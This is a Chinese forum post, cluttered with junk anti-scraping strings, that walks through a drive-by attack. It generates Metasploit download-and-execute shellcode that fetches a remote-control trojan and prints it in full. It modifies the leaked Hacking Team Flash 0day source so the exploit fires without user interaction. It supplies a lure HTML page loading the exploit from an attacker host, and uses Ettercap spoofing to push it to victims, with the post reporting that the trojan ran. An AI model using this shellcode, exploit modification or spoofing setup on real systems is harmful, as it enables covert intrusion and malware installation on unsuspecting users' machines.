|
" G3 S6 E K/ v, E5 Z6 F$ o 三、flash 0day之手工代码修改制作下载者实例入侵演示 9 p% ~1 z, D* V5 l. {8 r
K" P! g" y. h+ E7 r. ^, v+ X
3 z* M& [: k. Q: b; l 利用到的工具:
; [ U3 L, \$ Q/ e
5 M( ?) u# ?/ z! k3 G5 v4 ]7 ^ v4 O4 M8 k% F. t4 {6 z# d" ?
Msf
' g' r$ Z9 ]& X L( v- S 9 [! q/ w0 y$ r6 a7 U3 q
9 s, p3 s- \/ n! M. G
Ettercap
6 ~5 Y- z) n6 G& F' R6 M* ]! k& X1 s . X) q' V% A# i* z
* K) O3 W$ \/ T t Adobe Flash CS6 5 l5 T4 f: O7 E
' K+ T' ^& U' K# n, F
4 ?7 U: ~) S P i/ ]5 f Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
1 {8 x0 L _8 Z- @ 4 U2 m9 X0 y; l1 B: K5 B
/ K/ H$ N P8 @7 x+ ?2 f3 o
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options 6 K; H- U, m8 ]
$ r: J. A" \0 i- @% s. U% z
( X. H. g8 r& ]/ y/ {- s
如图:
/ C$ G3 I" A& V. S2 a$ u& C* a3 o : L! f$ y. d. {! {$ u& V! N
# e* [6 f" z, o$ s) r
7 T0 O+ C U! _) m2 v, j" A 9 }) H3 m ?( M" l2 @
# _, y' k, R2 [* G n
 . C0 v8 }9 X6 v# l. x3 |6 V
$ b q0 R4 V3 d J
& X2 H1 h7 C% X+ p 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
4 t1 l+ F) w' @& P+ }
6 x% p2 ?9 |! V# k A7 ~1 j
2 s& l. o3 A( v5 p1 ?# V 4 d( Q, s' S( }& O: z' E
+ J- Z: N0 K8 R: j3 z
9 m! t& v6 c/ |3 e" ?- x. ?  9 V3 J/ B- o0 Y7 j# @( B
# a+ G! J/ R3 P7 m/ P/ H( {) o4 n5 l% ]
然后执行generate -t dword生成shellcode,如下:
5 [ e7 O4 N6 r' g! g $ |4 n/ Z; {5 W+ t4 m
9 y1 {6 R; m% J) J: \# _! Y, @+ m
 ) K* n1 B1 _9 u, Y- j$ N
7 v4 X# }+ E x6 j
( U8 m$ c5 y7 Q 复制代码到文本下便于我们一会编辑flash exp,如下: 4 i, s# f$ l0 H. A6 N& _) I
. a" w' ~7 u+ l- F" l8 X8 X1 T) J/ r. a% T' h8 C$ b0 v _# J
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, Y6 u3 x$ i% V& t
6 x1 ^- q9 S9 u3 v2 o" k1 S6 j8 X( r8 c/ C3 C! q
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, ) R; R( s- X# z" r* E
+ y8 J0 ~, e9 i- P
' K: L+ s. n9 I! H5 K2 S- b
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, : [; I; M. r* Z
# w, o7 U& }% k' h4 h
' m& `5 A3 s# U8 W+ q/ n
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
* ~1 x0 W5 o# I( ~4 f. Q6 o : V) @2 K4 C% r6 u; B
- [: J+ L; Z" c, L R
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
+ D K* J1 q$ Y7 n0 B g8 E) _; b( L+ X
- U& @2 `/ F$ Z5 ~3 N
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
, E; V8 d6 s$ ~- H- I
6 V4 ]0 L5 s, @: H) Q
- {/ `- H, W7 c: M: v 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
: O) |3 h& P4 Z: \
6 u" b+ u8 u2 a% H% N
, K k% t3 l5 C 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
1 [6 d& {$ T' `1 Y2 {5 {3 r7 k' ^( t
, b& c/ |( h6 r! H' {1 h+ U2 Y i8 t: v0 R
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
5 q/ \0 m' @# n& o& ]
3 a2 i8 P0 H! X, y( j- t) x5 A1 h7 C$ u3 j7 K r
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
/ p* @8 k/ [2 l( n _# C ( _' _$ @( m/ k% @
7 [: u9 v4 ]# n. `# n 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 1 V. [4 M( E3 F! N' n8 F8 q
% Y5 d6 I. v2 ~* D
9 g2 c& _+ R* k% F2 h
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, % i; x+ V" K' I) b) F
E2 o% W+ l2 [
& t4 }3 h. t9 K% q7 Z; W9 y) w1 s 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
5 N& _6 B/ J8 {- ?. l0 H9 o9 v 8 o/ }7 ~7 y+ b$ g0 H
) N0 P* r+ z- I- _" k. T, K
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 ' |6 U3 G* A2 o5 T6 b9 N. Q
4 H0 Q! P' h ~/ u- j+ M/ b
4 t0 m# T) o7 R+ h1 u
& `# v7 B3 N q2 @. f+ T3 l8 {# ] u
) C. v* [4 y6 V/ ^1 @4 g2 w) `' M }: H( Q
; `6 ~/ V& v0 _/ ]
' _) f g1 B6 |% F6 U
! W& A$ x" ^$ J- J! }! e+ C 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 1 j9 H6 q+ `5 o v+ u3 A
- L: e. @9 h' d$ V# V
. _1 J! T# C% V: G0 y9 V) r  " z8 x: v: \2 s3 }2 v
# V4 Z7 d" [' ^" |7 W) A& {
# J6 C( E/ x T6 w U
先修改ShellWin32.as,部分源代码如图: 9 Z; K9 X/ R" w! t2 l$ K
. U5 m) g2 x5 R6 l4 a
5 Y- ?: d3 ~+ V& z  - M3 g5 b5 Q7 C9 s1 r
* w) K0 B9 a$ A8 B: x/ ?
( w# d& V6 s! E T2 P6 c( d& f* u 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 0 X# R# E/ V: V& t
- s: U: @1 t* _4 [4 O @& N
; E6 r2 R$ d1 i: Y/ k1 X. r 
! G8 e v% R, C- d2 x. M: l) v 9 x0 ]+ [% O- x5 H& \2 t7 K$ }5 t8 ~% ^
' u( P* m8 M! ^: U4 d# q
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: % H* {, d: S1 C! ?' h; }3 f
4 P& n7 ~4 g% C7 W6 @: w- _$ e- @4 z4 |8 T8 S# _
 5 f! W% U; \; Y/ l9 x; p/ e
: w8 w" P7 M% i3 r' I7 E) F# q
& F: A. X, y* P8 J 换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
* f5 A0 B7 y& k$ z1 j& j7 G / x3 I2 o/ o! u, a2 G! W8 Z% F
5 M) i, W& O d) @
: C0 ^$ O7 E* ?* \
9 ?+ \7 g5 X9 Y: C+ {6 J$ `6 P6 t
I7 p9 A7 { `( n1 { : u6 Y. T' S" T, {) W8 ]5 \
" N; ^6 d1 K, o) e# I, u% g: t+ T9 o
' s. O* w% a+ j, X8 B, n 
j1 ^/ w; `# z, R4 Y4 u' @& d! Y . m' ? _% s2 }9 G1 H r0 b
4 V% n1 h' S' D l4 [! Q* o 然后点保存,下面我们来编译一下,打开 2 c5 a9 C, F( w
0 M- n* Z! \' i# F5 o6 B o
$ ~# _1 R7 A' ?, U" d& U
exp1.fla然后点文件-发布,看看编译没错误
! V6 e5 b$ K. d+ P- A7 A! x# d3 F
+ s+ Q/ ?4 l2 i" c9 s
; |3 ~" O. ] E0 a1 O( B$ v% ~! l $ e, O p1 w6 Y( n$ E3 s
! N% m8 _$ Q8 `8 ?" @% T% _* N! g" J8 A( @/ Z, Y% p1 w
. W5 ]( ]+ j+ u, w
7 [0 |% ^# r; ?' U2 J! R( _
; l, E& R' L* C3 p' z& E* j
6 C6 i+ a! A5 U8 T8 A% U. z 8 j) H; Y( I/ n: O3 _/ m
/ ^3 O8 i% d) d$ x; `. }' ]/ \ 
" `5 I W1 {+ b + v7 C; R# u5 w( h5 ]
3 Y/ [% A( m0 p7 c8 s 然后我们把生成的 6 Q, g1 l3 @7 n, M
+ ~$ D! m8 w7 m# o
, i% ~+ C' q! n* P I3 W exp1.swf丢到kailinux 的/var/www/html下: % T/ k8 F2 g2 U# W+ q3 z
5 o: A _: Y& m/ }+ N U) x% v" x6 g8 y; j; h7 ~: g, I) D' D
然后把这段代码好好编辑一下
+ v9 `, E# H8 z& ^8 u% J ( `7 ^2 o" n0 z, N
0 o5 L2 ^! ^: W% _ }
E' \# t6 |; P, t1 r6 G* ~: O, m
' ^ G7 _3 g+ U; ?1 I. u: t+ k# t) y3 Z% {$ {+ q5 k' x, j
/ d( Z1 |$ \9 k) u, h
' |% Y' u2 ^9 l. E
# l4 |* w3 G. \2 u, L" ^" C 2 D+ f1 H7 M+ l8 ~: C% K
- X$ S7 Q* S) N4 q7 T3 S$ p1 ^; b! d8 Y+ Q9 g3 V+ j. e
7 y1 P$ o- W# \1 ^! g1 o& K+ j
7 ?+ t3 U: C- |0 l& Z/ a* ?' z$ `
5 \6 Z3 J- W6 C i8 T % d8 T- _, u4 b9 f( X2 }( v, A: F
/ l) `; @3 j" O; ?% f6 c7 n ?# e1 b( B \( i* c `1 G9 v- U
! j% Y2 M9 |6 h# Z ! c3 r/ U$ e) G8 L# f
S2 T- ^5 R4 p8 Y <!DOCTYPE html> ! C# a* u1 S% m z0 F
/ K- k M9 h; W# L' O* M, ]$ w8 X; V7 `
<html> 9 _0 v$ K4 H1 z6 o, M H5 c
) P1 k2 k: I" p% p; J! p
: S2 c9 k: `2 U$ g <head>
' G1 M5 [2 f# l1 }) l
* v2 g6 z K; Q) {& b1 G: k) u
2 `) n9 k% j. x3 v2 h% V <meta http-equiv="Content-Type" content="text/html;
. K/ ?0 P- n6 S) I3 q! j. B
1 k, i R& [, N6 ?3 }) Q4 y/ n+ ~6 U% l* w: O" `: U
charset=utf-8"/> * z2 j1 N z' C% N1 D
( R4 [9 w0 z, C7 @1 G# E4 j, _4 U
2 B5 P. {0 P* E </head>
& ?2 v4 P( ~2 u
% H2 ?% z% X. Z" T; ~$ U4 C( A# Q: n1 T5 C. I( G: H( C" a0 b
<body> % ~, S& F9 k8 n7 \0 V: r! e/ y
, E1 {& Y! I z3 Q* l
; `: i1 \2 a2 c) r# c9 Y <h2> Please wait, the requested page is loading...</h2>
7 t1 S5 x9 v9 M/ H; [ 2 ^6 q+ Y$ i! Y# t+ g; g; e; N1 @
, ^1 S- P3 {2 j
<br>
3 S' h% D$ A6 c. Y% J+ u
# [/ q7 o7 [/ ], i/ i1 g5 c/ e
" N% Z" h$ G4 K5 _ <OBJECT
- [+ S2 G' r3 \- y & h( _- w; _1 j" M! R* g8 n
9 L0 ?" K+ k$ W7 B. [7 r classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
: V7 u. e% |3 g& u ( p& y" b$ I" n/ G% L
Z& Y: T: y9 W) G* C
VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ! P- W( Z" U5 D4 W Q/ }
, O2 Z0 o* J% _1 R. Z7 A% V0 l' W0 Q4 B4 S, \$ E
</body>
8 T+ y: V! H# x! P+ \' b. ? " M. t4 m! ]* m" p
) R L' k) P& D+ V' O
<script> / E5 c$ H; W% j: W; B
0 o6 j: ^' ^$ b$ f8 ]
0 ~5 C% S/ x: E2 s setTimeout(function () {
' Q" L) S9 ? Q r% |! G w7 P 1 l# M8 o+ C/ m0 t y
/ g' f2 D8 I7 M5 M+ n! v
E8 ^' L* x, s7 ~: ?! g. w 8 O. d2 `. x; w7 `2 Z/ C' A) o7 t) Z
$ Y/ c* k- k. N1 X; @' ]) P0 Y window.location.reload();
F4 Z/ y/ ^3 x3 v ^4 b 7 Z+ \% P3 h( K$ ~ T7 f3 Y; U& u
5 y) v1 \9 v; X
}, 10000); $ I& {# P, [4 a: ]
: X* n+ }+ r4 }2 O) V. ^
1 y! @) R5 p* q+ @+ v! W4 Q
. d/ r4 J0 l( d4 k
5 e% q. `( n1 J
7 Y! X3 J% ^9 n" m- X' s4 P3 t3 I </script> , r! X, v8 r1 ^, ]7 x! Y! x
. n- `2 I9 b5 W$ D6 c& \; l% h
- P, w6 @8 R8 ?& x6 ~$ w3 a </html>
l K9 r% b1 }/ J- z) w# w ' z3 m9 Q* R) E" d& _5 K
; L2 \. R" h( o* F7 @
6 p- h) C$ M7 u! Z7 W- Z # b& E( B) ?" c) f
' y N' F& I ~/ E: p3 b 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 1 j2 Z7 r- [5 H( Z. f" P2 O: \
! g( u* m7 E1 K* _, B
3 q4 t& P P" f8 V( p) B  # R+ ]$ U6 g$ R1 e o( B. K7 M. R
* m9 w* X! Z' Z; f
+ O$ h1 ^' j4 I& g
3 O0 T6 V& i- {; v0 z$ e. a8 {
8 C' a" ?& J3 Z! [6 S/ W* ?
' F! I8 l/ S+ D2 i9 t! q
# e" T/ g0 l% O2 v
) R) G% |6 t1 C" u& D( q4 a- C5 l! D6 V/ P2 n3 j8 k* B
1 C+ I1 o& |( O/ J( S
, Z2 h' |2 W4 k4 ]7 }' A- u6 K
S4 l- J: f8 d3 c4 z
' N0 p& f5 l6 W
* D* @/ E+ C( ^6 ]3 J N# r0 U9 a
+ C1 u& K' y7 H7 m& A 下面我们用ettercap欺骗如图:
' T; r6 T' Z2 q" k4 C: t3 ?: N
3 z3 m9 v+ ~0 \( S8 G- O2 n, h0 Q- ]% z, D6 r/ A5 N$ J
 ( h. K$ P/ `$ ` T. a; @ r
]" d. ^4 g+ y) W4 D0 Q
+ Y w' y$ r7 `
& N2 c' O6 O) ^: ^1 z
5 r# X* F" ^! p' J1 d1 R H0 A3 H7 j
% ] V% ~" y4 E0 m* q7 l+ H ^5 x
下面我们随便访问个网站看看:
5 [. a+ `9 q) X% g% r% n& @& m u
. X8 u) i5 h8 S! C5 v0 e2 V6 ~4 k& I4 r4 j4 V7 h' y' s: X T
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
3 x _& q1 S8 w- G8 v 3 B# F/ i% {9 e
: e8 ^" w0 O' B; f1 ]5 m6 I* Y
 ( Z% X/ \ k( q$ k
$ l$ d, M# V* C
( h' N& ~# l, S" K2 k 我们看另一台, : z/ s8 ?; x' ~, Z* K! w
' t! l2 y: ^" g
4 ]# g' C$ V6 ^' o- E 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 ' D0 G- r& R( I
| 
发表于 2018-10-20 20:28:55
收藏
支持
反对